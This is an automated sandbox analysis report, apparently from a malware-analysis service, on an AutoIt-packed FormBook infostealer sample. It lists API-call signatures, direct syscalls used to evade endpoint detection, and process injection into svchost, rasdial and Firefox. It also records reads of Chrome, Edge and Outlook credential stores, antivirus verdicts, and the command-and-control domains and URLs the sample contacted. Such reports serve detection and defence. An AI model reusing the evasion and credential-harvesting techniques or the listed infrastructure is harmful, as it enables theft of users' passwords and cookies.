Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C42840 mov ecx, dword ptr fs:[00000030h]	3_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60854 mov eax, dword ptr fs:[00000030h]	3_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34859 mov eax, dword ptr fs:[00000030h]	3_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C34859 mov eax, dword ptr fs:[00000030h]	3_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE872 mov eax, dword ptr fs:[00000030h]	3_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE872 mov eax, dword ptr fs:[00000030h]	3_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6870 mov eax, dword ptr fs:[00000030h]	3_2_03CC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6870 mov eax, dword ptr fs:[00000030h]	3_2_03CC6870

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_00700B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

1_2_00700B62

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_006D2622
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_006C083F
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C09D5 SetUnhandledExceptionFilter,	1_2_006C09D5
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_006C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_006C0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rasdial.exe

Thread register set: target process: 1532

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\rasdial.exe

Thread APC queued: target process: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 315A008

Jump to behavior

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

1_2_00701201

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006E2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_006E2BA5

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0070B226 SendInput,keybd_event,

1_2_0070B226

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_007222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

1_2_007222DA

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

1_2_00700B62

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_00701663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00701663

Source: cNDddMAF5u.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cNDddMAF5u.exe, GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: GVXcOVOPuWmumK.exe, 00000005.00000000.1625841544.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000005.00000002.2584738481.0000000001891000.00000002.00000001.00040000.00000000.sdmp, GVXcOVOPuWmumK.exe, 00000007.00000002.2585424871.0000000001781000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006C0698 cpuid

1_2_006C0698

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_00718195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

1_2_00718195

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006FD27A GetUserNameW,

1_2_006FD27A

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

1_2_006DB952

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_006A42DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: cNDddMAF5u.exe	Binary or memory string: WIN_81
Source: cNDddMAF5u.exe	Binary or memory string: WIN_XP
Source: cNDddMAF5u.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: cNDddMAF5u.exe	Binary or memory string: WIN_XPe
Source: cNDddMAF5u.exe	Binary or memory string: WIN_VISTA
Source: cNDddMAF5u.exe	Binary or memory string: WIN_7
Source: cNDddMAF5u.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00721204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		1_2_00721204
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_00721806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		1_2_00721806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	241 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	12 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cNDddMAF5u.exe	65%	Virustotal		Browse
cNDddMAF5u.exe	82%	ReversingLabs	Win32.Trojan.AutoitInject
cNDddMAF5u.exe	100%	Avira	HEUR/AGEN.1319493
cNDddMAF5u.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.bcg.services/5onp/	0%	Avira URL Cloud	safe
http://www.43kdd.top/bsyy/	0%	Avira URL Cloud	safe
http://www.lgdiamonds.info	0%	Avira URL Cloud	safe
http://www.lgdiamonds.info/cv1w/	0%	Avira URL Cloud	safe
http://www.lgdiamonds.info/cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp	0%	Avira URL Cloud	safe
http://www.75178.club/vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy	0%	Avira URL Cloud	safe
http://www.43kdd.top/bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob	0%	Avira URL Cloud	safe
http://www.bcg.services/5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.lgdiamonds.info	130.185.109.77	true	false	high
43kdd.top	154.23.178.231	true	false	unknown
jalan2.online	108.181.189.7	true	false	high
gtml.huksa.huhusddfnsuegcdn.com	23.167.152.41	true	false	high
www.bcg.services	13.248.169.48	true	false	high
www.75178.club	unknown	unknown	false	high
www.jalan2.online	unknown	unknown	false	high
www.egldfi.xyz	unknown	unknown	true	unknown
www.betmatchx.online	unknown	unknown	false	high
www.43kdd.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.lgdiamonds.info/cv1w/	false	Avira URL Cloud: safe	unknown
http://www.43kdd.top/bsyy/	false	Avira URL Cloud: safe	unknown
http://www.lgdiamonds.info/cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp	false	Avira URL Cloud: safe	unknown
http://www.bcg.services/5onp/	false	Avira URL Cloud: safe	unknown
http://www.bcg.services/5onp/?Ebq4kd=YQtAzQFhELh+NSSoDqDomWI7hzIl6D7m8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+VQ7bztTOkaWbq6GbSDD5gGudwG2s7dN0Aj/drkK6Y9amBXkHtwtBoxSc&zNH=npZPFHp	false	Avira URL Cloud: safe	unknown
http://www.43kdd.top/bsyy/?zNH=npZPFHp&Ebq4kd=w9Wsyrfddra1GxcU+lvvJ4oQD8tz6DR/pSTnVJEXbHEmdfQx+6bPNdVPoslsCSigyUnMPNoyb3wBtIJwqnPVsz+Ro0OM8Jd88jKv7OGJqHGxaYpNVHYIOGV13jdXqVR/FDBUfHDkP5ob	false	Avira URL Cloud: safe	unknown
http://www.75178.club/vl4d/?zNH=npZPFHp&Ebq4kd=QHNq3VljPHXHL8Z9j/8QJFBBwlzGlceqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym3iwquLse32UPpx06xoyG1OKfEhnqUlOVcfeYCw/nYg4o8/AZZgvgbyHy	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
